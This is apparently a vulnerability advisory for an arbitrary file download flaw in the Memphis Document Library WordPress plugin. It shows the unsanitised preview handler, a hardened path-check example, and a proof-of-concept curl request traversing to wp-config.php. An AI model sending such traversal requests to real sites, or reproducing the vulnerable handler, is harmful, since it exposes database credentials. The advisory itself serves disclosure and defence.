Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download



Description
The function "mdocs_img_preview" serves image previews previously uploaded by the administrator, but it does not sanitize the requested file path, which allows arbitrary files on the file system to be downloaded.

The vulnerable GET parameter is "mdocs-img-preview".

The vulnerable code is in lines 90 to 93 of file "memphis-documents-library/mdocs-downloads.php":

87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }
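
A hardened path check for this handler, as an added example that is neither the plugin's code nor the 3.1.6 fix. The helper name mdocs_resolve_preview, the extension allow-list and the temporary demo tree are assumptions made for illustration.

```php
<?php
// Added example (hypothetical helper, not the plugin's code).
// Returns the resolved path of a preview image inside $base_dir, or false.
function mdocs_resolve_preview(string $base_dir, string $requested)
{
    // Reject empty names and NUL bytes before touching the file system.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return false;
    }
    // Allow-list image extensions; the vulnerable code served any file type.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return false;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return false;
    }
    // realpath() collapses "../" segments and follows symlinks;
    // it returns false when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return false;
    }
    // Containment: the resolved path must still sit under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : false;
}

// Constructed demo tree standing in for $upload_dir['basedir'].MDOCS_DIR.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mdocs-demo-' . getmypid();
$base = $root . '/uploads/mdocs';
mkdir($base, 0700, true);
file_put_contents($root . '/wp-config.php', "<?php // constructed\n");
file_put_contents($root . '/outside.jpg', 'constructed bytes');
file_put_contents($base . '/cover.jpg', 'constructed bytes');

// Constructed requests: one legitimate name, two traversals, one missing file.
$requests = ['cover.jpg', '../../wp-config.php', '../../outside.jpg', 'missing.jpg'];
foreach ($requests as $name) {
    $verdict = mdocs_resolve_preview($base, $name) === false ? 'rejected' : 'served';
    printf("%-22s %s\n", $name, $verdict);
}
```

The "../../outside.jpg" request passes the extension allow-list and is stopped only by the containment check, which is why the resolved path is compared against the base directory instead of relying on the file type alone.
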
Proof of Concept
curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

Affects Plugin

fixed in version 3.1.6

References

EXPLOITDB 39593

Classification

Type BYPASS

Miscellaneous

Submitter Felipe Molina
Submitter Twitter felmoltor
Views 5185
Verified No
WPVDB ID 8419

Timeline

Publicly Published 2016-03-22 (over 3 years ago)
Added 2016-03-22 (over 3 years ago)
Last Updated 2019-10-31 (17 days ago)
